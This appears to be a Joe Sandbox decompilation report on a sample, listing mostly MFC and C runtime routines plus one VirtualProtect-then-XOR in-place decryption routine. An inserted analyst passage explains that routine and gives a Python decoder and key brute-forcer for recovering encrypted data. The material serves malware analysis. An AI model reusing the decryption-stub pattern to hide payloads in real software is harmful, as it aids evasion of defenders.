      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memcpy_s
      • String ID:
      • API String ID: 2001391462-0
      • Opcode ID: bb27cc9c1c0c54715e5167daa2b6d13700dffbccc68468bcf44fe9e9898f7fda
      • Instruction ID: aa2c023e4eb86493edad9b4ad36c20cdfe13e34eac0f80eb74bb83a9077574ae
      • Opcode Fuzzy Hash: bb27cc9c1c0c54715e5167daa2b6d13700dffbccc68468bcf44fe9e9898f7fda
      • Instruction Fuzzy Hash: 23116076600A04AFD704DF6CC880D6AB3A9EF8A310721865DF5198B350EB71ED01CBD0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E009A2BE0(void* __ecx, void* __eflags, intOrPtr _a4) {
      				intOrPtr _v8;
      				char _v16;
      				signed int _v20;
      				char _v24;
      				signed int _t15;
      				char _t19;
      				intOrPtr* _t20;
      				void* _t22;
      				signed int _t24;
      				intOrPtr* _t30;
      				signed int _t43;
      				signed int _t50;
      				signed int _t51;
      
      				_push(0xffffffff);
      				_push(0xac78f8);
      				_push( *[fs:0x0]);
      				_t15 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t15 ^ _t51);
      				 *[fs:0x0] =  &_v16;
      				_t19 = E009A1170(__ecx,  &_v20);
      				_v8 = 0;
      				_t20 = E009A25E0(_t19); // executed
      				_t43 = _v20;
      				_t30 = _t20;
      				_v8 = 0xffffffff;
      				if(_t43 != 0) {
      					E00AC5AED( &_v24, 0);
      					_t24 =  *(_t43 + 4);
      					if(_t24 != 0 && _t24 < 0xffffffff) {
      						 *(_t43 + 4) = _t24 - 1;
      					}
      					asm("sbb esi, esi");
      					E00AC5B15( &_v24);
      					_t50 =  !( ~( *(_t43 + 4))) & _t43;
      					if(_t50 != 0) {
      						 *((intOrPtr*)( *((intOrPtr*)( *_t50))))(1);
      					}
      				}
      				_t22 =  *((intOrPtr*)( *((intOrPtr*)( *_t30 + 0x18))))(_a4);
      				 *[fs:0x0] = _v16;
      				return _t22;
      			}

      0x009a2be3
      0x009a2be5
      0x009a2bf0
      0x009a2bf7
      0x009a2bfe
      0x009a2c02
      0x009a2c0c
      0x009a2c12
      0x009a2c19
      0x009a2c1e
      0x009a2c24
      0x009a2c26
      0x009a2c2f
      0x009a2c36
      0x009a2c3b
      0x009a2c40
      0x009a2c48
      0x009a2c48
      0x009a2c50
      0x009a2c57
      0x009a2c5c
      0x009a2c5e
      0x009a2c68
      0x009a2c68
      0x009a2c5e
      0x009a2c75
      0x009a2c7a
      0x009a2c88

      APIs
        • Part of subcall function 009A1170: std::_Lockit::_Lockit.LIBCPMT ref: 009A118C
        • Part of subcall function 009A25E0: std::_Lockit::_Lockit.LIBCPMT ref: 009A260D
        • Part of subcall function 009A25E0: std::_Lockit::_Lockit.LIBCPMT ref: 009A2630
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2C36
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_
      • String ID:
      • API String ID: 3382485803-0
      • Opcode ID: 3ef3947b69759da2a10f14b5534552d3d46e8a845f5437db6dc50b269ecbf8d5
      • Instruction ID: b01b5ac26b125f851254195411d217fc4b677f02b13b1f1c51debd717b4fd6dc
      • Opcode Fuzzy Hash: 3ef3947b69759da2a10f14b5534552d3d46e8a845f5437db6dc50b269ecbf8d5
      • Instruction Fuzzy Hash: ED114F71A00A15ABCB14DF68C981B9EB3B8FB59721F104769E929D7281E731A904CBD1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 95%
      			E009A11D0(void* __edx, long _a4, long _a8) {
      				signed int _t16;
      				long _t17;
      				signed char _t18;
      				void* _t19;
      				void* _t20;
      				void* _t21;
      				void* _t22;
      				long _t23;
      				void* _t24;
      
      				_t19 = __edx;
      				_t22 = _a4;
      				_t17 = 0;
      				if(_t22 == 0) {
      					L12:
      					return 0;
      				} else {
      					_t23 = _a8;
      					if(_t23 == 0) {
      						goto L12;
      					} else {
      						_a4 = 0;
      						VirtualProtect(_t22, _t23, 4,  &_a4); // executed
      						if(_t23 > 0) {
      							asm("cdq");
      							_t16 = _t23 - _t19 >> 1;
      							_t24 = _t22;
      							do {
      								_t18 =  *_t24;
      								if(_t17 >= _t16) {
      									_t20 = 8;
      									do {
      										_t18 = _t18 ^  *(_t20 + _t22 - 0x10);
      										_t20 = _t20 + 2;
      										 *_t24 = _t18;
      									} while (_t20 < 0x10);
      								} else {
      									_t21 = 0;
      									do {
      										_t18 = _t18 ^  *(_t21 + _t22 - 0x10);
      										_t21 = _t21 + 2;
      										 *_t24 = _t18;
      									} while (_t21 < 8);
      								}
      								_t17 = _t17 + 1;
      								_t24 = _t24 + 1;
      							} while (_t17 < _a8);
      						}
      						return 1;
      					}
      				}
      			}

      0x009a11d0
      0x009a11d6
      0x009a11d9
      0x009a11dd
      0x009a1248
      0x009a124c
      0x009a11df
      0x009a11df
      0x009a11e4
      0x00000000
      0x009a11e6
      0x009a11ee
      0x009a11f1
      0x009a11f9
      0x009a11fd
      0x009a1200
      0x009a1202
      0x009a1204
      0x009a1204
      0x009a1208
      0x009a1220
      0x009a1225
      0x009a1225
      0x009a1229
      0x009a122c
      0x009a122e
      0x009a120a
      0x009a120a
      0x009a1210
      0x009a1210
      0x009a1214
      0x009a1217
      0x009a1219
      0x009a121e
      0x009a1233
      0x009a1234
      0x009a1235
      0x009a1204
      0x009a1243
      0x009a1243
      0x009a11e4

      APIs
      • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 009A11F1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 82e0a789294ac4097d37b66dfd46c3f6024cb1614e740670f8423e999b13289b
      • Instruction ID: 12362d18e54ac3b339cb2a350a67d247ee71e8a452e1f495bed4325ae7c67e0d
      • Opcode Fuzzy Hash: 82e0a789294ac4097d37b66dfd46c3f6024cb1614e740670f8423e999b13289b
      • Instruction Fuzzy Hash: 2701DE722040952BD7204E6D98C07EFBB9EEBC2324F69C52AE9E4CA101C130D88683E0
      Uniqueness

      Uniqueness Score: -1.00%
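Of the routines listed here, E009A11D0 is the one that looks sample-specific rather than compiler-runtime or MFC code (for comparison, E009AD67F is MFC's AfxWndProc, 0x360 being WM_QUERYAFXWNDPROC, and E00ABB065 is the CRT's calloc path: RtlAllocateHeap with flag 8, HEAP_ZERO_MEMORY, behind a 0xFFFFFFE0 request-size guard and errno 0xC, ENOMEM). It calls VirtualProtect with 4 (PAGE_READWRITE) on the buffer it is handed, which suggests the buffer normally sits in a non-writable mapping such as an image section, then XORs the buffer in place with key bytes read at stride 2 from the 16 bytes immediately before the buffer: offsets 0, 2, 4, 6 for the first half and 8, 10, 12, 14 for the second. Because XOR is associative, that is really a single-byte XOR per half, which matters when only the encrypted buffer was dumped and the key prefix was not. The Python below is an added example, not code from the report or the sample: a statement-for-statement port of the loop, the collapsed two-byte form, a helper that applies the routine's calling convention to a raw dump, and a brute-force that lists the byte values turning each half into printable ASCII. The key and plaintext are constructed here; the stride-2 key layout is chosen to match what the routine reads and is not a claim about the sample's actual key.

```python
"""Port of the in-place XOR routine at 009A11D0 (added example, not the sample's code).

The decompiled loop reads its key from the 16 bytes immediately *before* the
buffer (buf - 0x10), stepping through them two bytes at a time: offsets
0,2,4,6 for the first half of the buffer and 8,10,12,14 for the second half.
"""

PAGE_READWRITE = 0x04  # the protection constant the routine passes to VirtualProtect


def collapse_key(key16: bytes) -> tuple[int, int]:
    """XOR is associative, so the four key bytes applied to each half of the
    buffer collapse to a single byte per half. Returns (lo, hi)."""
    if len(key16) != 16:
        raise ValueError("the routine reads exactly 16 bytes before the buffer")
    lo = key16[0] ^ key16[2] ^ key16[4] ^ key16[6]
    hi = key16[8] ^ key16[10] ^ key16[12] ^ key16[14]
    return lo, hi


def decode_literal(key16: bytes, data: bytes) -> bytes:
    """Statement-for-statement port of the loop in E009A11D0 (minus the
    VirtualProtect call). An empty buffer simply comes back empty; the
    original returns 0 without touching it."""
    out = bytearray(data)
    half = len(out) // 2          # cdq / sub edx / sar 1 on a positive length
    for i in range(len(out)):
        b = out[i]
        if i >= half:
            for k in range(8, 0x10, 2):   # *(buf - 0x10 + k), k = 8,10,12,14
                b ^= key16[k]
        else:
            for k in range(0, 8, 2):      # *(buf - 0x10 + k), k = 0,2,4,6
                b ^= key16[k]
        out[i] = b
    return bytes(out)


def decode(key16: bytes, data: bytes) -> bytes:
    """Equivalent, faster form: each half XORed with one constant byte."""
    lo, hi = collapse_key(key16)
    half = len(data) // 2
    return bytes(b ^ (lo if i < half else hi) for i, b in enumerate(data))


def decode_region(blob: bytes, offset: int, length: int) -> bytes:
    """Apply the routine's calling convention to a raw dump: the buffer is at
    `offset` and its key is the 16 bytes that precede it."""
    if offset < 0x10 or offset + length > len(blob):
        raise ValueError("region or its 16-byte key prefix is out of bounds")
    return decode(blob[offset - 0x10:offset], blob[offset:offset + length])


def candidate_keys(ciphertext: bytes) -> tuple[list[int], list[int]]:
    """When the key prefix is not in hand (e.g. only the encrypted buffer was
    dumped), the collapse makes each half a single-byte XOR: list every byte
    value that turns a half into printable ASCII (0x20..0x7e)."""
    half = len(ciphertext) // 2
    halves = (ciphertext[:half], ciphertext[half:])
    result = []
    for part in halves:
        result.append([k for k in range(256)
                       if all(0x20 <= (b ^ k) <= 0x7E for b in part)])
    return result[0], result[1]


# Constructed sample data (not taken from the sample): a stride-2 key layout
# and a plaintext, encrypted with the same routine since XOR is its own inverse.
SAMPLE_KEY16 = b"K\x00e\x00y\x00!\x00s\x00e\x00c\x00?\x00"
SAMPLE_PLAINTEXT = b"constructed sample string"
SAMPLE_CIPHERTEXT = decode(SAMPLE_KEY16, SAMPLE_PLAINTEXT)


if __name__ == "__main__":
    blob = SAMPLE_KEY16 + SAMPLE_CIPHERTEXT
    print(collapse_key(SAMPLE_KEY16))
    print(decode_region(blob, 0x10, len(SAMPLE_CIPHERTEXT)))
    print(candidate_keys(SAMPLE_CIPHERTEXT))
```

decode_region mirrors how the routine is called: given a dump of the section, pass the buffer's offset and length and it takes the key from the 16 bytes in front of the buffer. candidate_keys is for the case where those 16 bytes were not captured; the true key byte is always among the candidates when the plaintext is printable, so check the few survivors by hand rather than trusting a single best score.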

      C-Code - Quality: 86%
      			E00ABB065(signed int _a4, signed int _a8, long _a12) {
      				void* _t10;
      				long _t11;
      				long _t12;
      				signed int _t13;
      				signed int _t17;
      				long _t19;
      				long _t24;
      
      				_t17 = _a4;
      				if(_t17 == 0) {
      					L3:
      					_t24 = _t17 * _a8;
      					__eflags = _t24;
      					if(_t24 == 0) {
      						_t24 = _t24 + 1;
      						__eflags = _t24;
      					}
      					goto L5;
      					L6:
      					_t10 = RtlAllocateHeap( *0xd13a24, 8, _t24); // executed
      					__eflags = 0;
      					if(0 == 0) {
      						goto L7;
      					}
      					L14:
      					return _t10;
      					goto L15;
      					L7:
      					__eflags =  *0xd142e8;
      					if( *0xd142e8 == 0) {
      						_t19 = _a12;
      						__eflags = _t19;
      						if(_t19 != 0) {
      							 *_t19 = 0xc;
      						}
      					} else {
      						_t11 = E00AB6403(_t10, _t24);
      						__eflags = _t11;
      						if(_t11 != 0) {
      							L5:
      							_t10 = 0;
      							__eflags = _t24 - 0xffffffe0;
      							if(_t24 > 0xffffffe0) {
      								goto L7;
      							} else {
      								goto L6;
      							}
      						} else {
      							_t12 = _a12;
      							__eflags = _t12;
      							if(_t12 != 0) {
      								 *_t12 = 0xc;
      							}
      							_t10 = 0;
      						}
      					}
      					goto L14;
      				} else {
      					_t13 = 0xffffffe0;
      					_t27 = _t13 / _t17 - _a8;
      					if(_t13 / _t17 >= _a8) {
      						goto L3;
      					} else {
      						 *((intOrPtr*)(E00AADB06(_t27))) = 0xc;
      						return 0;
      					}
      				}
      				L15:
      			}

      0x00abb06a
      0x00abb06f
      0x00abb08c
      0x00abb091
      0x00abb093
      0x00abb095
      0x00abb097
      0x00abb097
      0x00abb097
      0x00000000
      0x00abb09f
      0x00abb0a8
      0x00abb0ae
      0x00abb0b0
      0x00000000
      0x00000000
      0x00abb0e4
      0x00abb0e6
      0x00000000
      0x00abb0b2
      0x00abb0b2
      0x00abb0b9
      0x00abb0d7
      0x00abb0da
      0x00abb0dc
      0x00abb0de
      0x00abb0de
      0x00abb0bb
      0x00abb0bc
      0x00abb0c2
      0x00abb0c4
      0x00abb098
      0x00abb098
      0x00abb09a
      0x00abb09d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00abb0c6
      0x00abb0c6
      0x00abb0c9
      0x00abb0cb
      0x00abb0cd
      0x00abb0cd
      0x00abb0d3
      0x00abb0d3
      0x00abb0c4
      0x00000000
      0x00abb071
      0x00abb075
      0x00abb078
      0x00abb07b
      0x00000000
      0x00abb07d
      0x00abb082
      0x00abb08b
      0x00abb08b
      0x00abb07b
      0x00000000

      APIs
      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AB4DA5,00000000,?,00000000,00000000,00000000,?,00AB4236,00000001,00000214), ref: 00ABB0A8
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeap__getptd_noexit
      • String ID:
      • API String ID: 328603210-0
      • Opcode ID: 55fdf88104db90617811f3ee1c72617a99381bb9d84c5a4ee21e036d88c222ef
      • Instruction ID: f5d3ab543284786ceb8289f7699bec422c56efaf5882aba58c3cc96162e2cfea
      • Opcode Fuzzy Hash: 55fdf88104db90617811f3ee1c72617a99381bb9d84c5a4ee21e036d88c222ef
      • Instruction Fuzzy Hash: 8A019E312212159AEB34BF25DC04BFB37A8AB81360F01852AE865CB6D1DBB08C00C760
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E009BCDBD(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				void* _t17;
      				intOrPtr _t19;
      				intOrPtr _t21;
      				long* _t24;
      				intOrPtr _t25;
      				intOrPtr* _t30;
      				void* _t31;
      
      				_t23 = __ecx;
      				_t22 = __ebx;
      				_push(4);
      				E00AAD232(0xac8abe, __ebx, __edi, __esi);
      				_t30 = __ecx;
      				if((0 |  *((intOrPtr*)(_t31 + 8)) != 0x00000000) == 0) {
      					L1:
      					E009B8782(_t23);
      				}
      				if( *_t30 == 0) {
      					_t23 =  *0xd0fcc0; // 0x0
      					if(_t23 != 0) {
      						L5:
      						_t19 = E009BC9BB(_t23); // executed
      						 *_t30 = _t19;
      						if(_t19 == 0) {
      							goto L1;
      						}
      					} else {
      						 *((intOrPtr*)(_t31 - 0x10)) = 0xd0fcc4;
      						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
      						_t21 = E009BCAD3(0xd0fcc4);
      						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
      						_t23 = _t21;
      						 *0xd0fcc0 = _t21;
      						if(_t21 == 0) {
      							goto L1;
      						} else {
      							goto L5;
      						}
      					}
      				}
      				_t24 =  *0xd0fcc0; // 0x0
      				_t28 = E009BC85D(_t24,  *_t30);
      				_t39 = _t28;
      				if(_t28 == 0) {
      					_t17 =  *((intOrPtr*)(_t31 + 8))();
      					_t25 =  *0xd0fcc0; // 0x0
      					_t28 = _t17;
      					E009BCB7A(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
      				}
      				return E00AAD30A(_t28);
      			}

      0x009bcdbd
      0x009bcdbd
      0x009bcdbd
      0x009bcdc4
      0x009bcdc9
      0x009bcdd5
      0x009bcdd7
      0x009bcdd7
      0x009bcdd7
      0x009bcddf
      0x009bcde1
      0x009bcde9
      0x009bce0c
      0x009bce0c
      0x009bce11
      0x009bce15
      0x00000000
      0x00000000
      0x009bcdeb
      0x009bcdf0
      0x009bcdf3
      0x009bcdf7
      0x009bcdfc
      0x009bce00
      0x009bce02
      0x009bce0a
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009bce0a
      0x009bcde9
      0x009bce19
      0x009bce24
      0x009bce26
      0x009bce28
      0x009bce2a
      0x009bce2d
      0x009bce33
      0x009bce38
      0x009bce38
      0x009bce44

      APIs
      • __EH_prolog3.LIBCMT ref: 009BCDC4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3Throw
      • String ID:
      • API String ID: 3670251406-0
      • Opcode ID: b7136be5bdff8582178355d99f648accf9d464350a0c027afe4f8c4108aa574b
      • Instruction ID: 6c343e9c78424c8c3c3a4b3510cb8410b6c80272d468b354f56585fbdc0b1133
      • Opcode Fuzzy Hash: b7136be5bdff8582178355d99f648accf9d464350a0c027afe4f8c4108aa574b
      • Instruction Fuzzy Hash: 5D017CB4640206DBEB24AF648A527A93AA6BBC0370F20403EE895C77D0DF30CD00CB65
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009AD67F(struct HWND__* _a4, int _a8, int _a12, long _a16) {
      				void* __esi;
      				void* __ebp;
      				void* _t10;
      				long _t11;
      				void* _t14;
      				void* _t15;
      				void* _t16;
      				void* _t17;
      				struct HWND__* _t19;
      
      				if(_a8 != 0x360) {
      					_t19 = _a4;
      					_t10 = E009AC937(_t14, _t15, _t16, _t17, _t19, __eflags, _t19);
      					__eflags = _t10;
      					if(_t10 == 0) {
      						L5:
      						_t11 = DefWindowProcA(_t19, _a8, _a12, _a16);
      						L6:
      						return _t11;
      					}
      					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t19;
      					if(__eflags != 0) {
      						goto L5;
      					}
      					_t11 = E009AD57A(_t14, _t17, _t19, __eflags, _t10, _t19, _a8, _a12, _a16); // executed
      					goto L6;
      				}
      				return 1;
      			}

      0x009ad68b
      0x009ad693
      0x009ad697
      0x009ad69c
      0x009ad69e
      0x009ad6b7
      0x009ad6c1
      0x009ad6c7
      0x00000000
      0x009ad6c7
      0x009ad6a0
      0x009ad6a3
      0x00000000
      0x00000000
      0x009ad6b0
      0x00000000
      0x009ad6b0
      0x00000000

      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9d1fbdfb69218825c9dd97540010accc4719a5cc217dd778e38276f94e0852cd
      • Instruction ID: 9dbf9c028f1b1b39ad026107e16f89f8acbc8b42bcb01d463edf8bdc52a9ed99
      • Opcode Fuzzy Hash: 9d1fbdfb69218825c9dd97540010accc4719a5cc217dd778e38276f94e0852cd
      • Instruction Fuzzy Hash: 64F08C32402258FB8F129E909C04DEB3B2DAF4A361F048415FA1A51420C336C920EBE5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A705A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
      				signed int _t6;
      				void* _t13;
      				void* _t17;
      				intOrPtr* _t18;
      
      				_t18 = __ecx;
      				_t6 = E009AC865(_t13, __ecx, _t17, __eflags);
      				if(_t6 != 0xffffffff) {
      					_t6 =  *((intOrPtr*)( *_t18 + 0x198))(_a4, _a8);
      					__eflags = _t6;
      					if(_t6 == 0) {
      						goto L1;
      					}
      					PostMessageA( *(_t18 + 0x20), 0x362, 0xe001, 0);
      					 *((intOrPtr*)( *_t18 + 0x174))(1);
      					__eflags = 0;
      					return 0;
      				}
      				L1:
      				return _t6 | 0xffffffff;
      			}

      0x009a7060
      0x009a7062
      0x009a706a
      0x009a707b
      0x009a7081
      0x009a7083
      0x00000000
      0x00000000
      0x009a7094
      0x009a70a0
      0x009a70a6
      0x00000000
      0x009a70a6
      0x009a706c
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessagePost
      • String ID:
      • API String ID: 410705778-0
      • Opcode ID: c8593db107e429a3bd0550f2f008151054ce99ebd2fee39a454af26ef2aeabe8
      • Instruction ID: 55db02d3c83828867b8e6e89c041e1eeb40f50c001f8e831e6967726ccd9ef12
      • Opcode Fuzzy Hash: c8593db107e429a3bd0550f2f008151054ce99ebd2fee39a454af26ef2aeabe8
      • Instruction Fuzzy Hash: CFF0A731344610ABCB215B74CC05F9A7BA5AF45730F110616F9659A1D1CAB1D8509A80
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 88%
      			E009BC8C9(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _t19;
      				void* _t20;
      
      				_push(8);
      				E00AAD265(0xac8a78, __ebx, __edi, __esi);
      				_t19 = __ecx;
      				if( *__ecx == 0) {
      					E009C2A0C(0x10);
      					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
      					if( *__ecx == 0) {
      						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
      					}
      					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
      					E009C2A7E(0x10);
      				}
      				return E00AAD30A( *_t19);
      			}

      0x009bc8c9
      0x009bc8d0
      0x009bc8d5
      0x009bc8db
      0x009bc8df
      0x009bc8e6
      0x009bc8ec
      0x009bc8f1
      0x009bc8f1
      0x009bc8f3
      0x009bc8f9
      0x009bc8f9
      0x009bc905

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009BC8D0
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
        • Part of subcall function 009C2A0C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
        • Part of subcall function 009C2A0C: LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
